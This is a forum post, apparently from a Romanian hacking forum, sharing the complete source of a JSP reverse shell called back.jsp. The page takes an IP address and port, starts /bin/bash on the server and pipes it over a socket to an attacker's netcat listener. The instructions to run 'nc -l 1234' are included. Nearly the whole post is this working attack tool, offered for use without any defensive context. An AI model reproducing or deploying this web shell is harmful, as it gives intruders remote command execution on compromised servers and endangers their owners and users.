Jump to content
Eric

Back Connect - JSP

By Eric, in Programe utile

Recommended Posts

Eric Newbie

Eric

Posted
Posted

back.jsp 


<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
    class StreamConnector extends Thread {

        InputStream is;
        OutputStream os;

        StreamConnector(InputStream is, OutputStream os) {
            this.is = is;
            this.os = os;
        }

        public void run() {
            BufferedReader isr = null;
            BufferedWriter osw = null;
            try {
                isr = new BufferedReader(new InputStreamReader(is));
                osw = new BufferedWriter(new OutputStreamWriter(os));
                char buffer[] = new char[8192];
                int lenRead;
                while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {
                    osw.write(buffer, 0, lenRead);
                    osw.flush();
                }
            } catch (Exception ioe) {
                System.out.println("exception " + ioe.getMessage());
            }
            try {
                if (isr != null)
                    isr.close();
                if (osw != null)
                    osw.close();
            } catch (Exception ioe) {
                System.out.println("exception " + ioe.getMessage());
            }
        }

    }
%>

<h1>JSP Reverse Shell</h1>
<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>
<form method="get">
	IP Address<input type="text" name="ipaddress" size=30 value="127.0.0.1"/>
	Port<input type="text" name="port" size=10 value="1234"/>
	<input type="submit" name="Connect" value="Connect"/>
</form>

<%
    String ipAddress = request.getParameter("ipaddress");
    String ipPort = request.getParameter("port");
    Socket sock = null;
    Process proc = null;
    if (ipAddress != null && ipPort != null) {
        try {
            sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
            System.out.println("socket created: " + sock.toString());
            Runtime rt = Runtime.getRuntime();
            proc = rt.exec("/bin/bash");
            System.out.println("process /bin/bash started: " + proc.toString());
            StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());
            System.out.println("outputConnector created: " + outputConnector.toString());
            StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());
            System.out.println("inputConnector created: " + inputConnector.toString());
            outputConnector.start();
            inputConnector.start();
        } catch (Exception e) {
            System.out.println("exception " + e.getMessage());
        }
    }
    if (sock != null && proc != null) {
        out.println("<div class='separator'></div>");
        out.println("<p>Process /bin/bash, running as ("+ proc.toString()+", is connected to socket " + sock.toString() + ".</p>");
    }
%>

<%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import=" - Pastebin.com

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...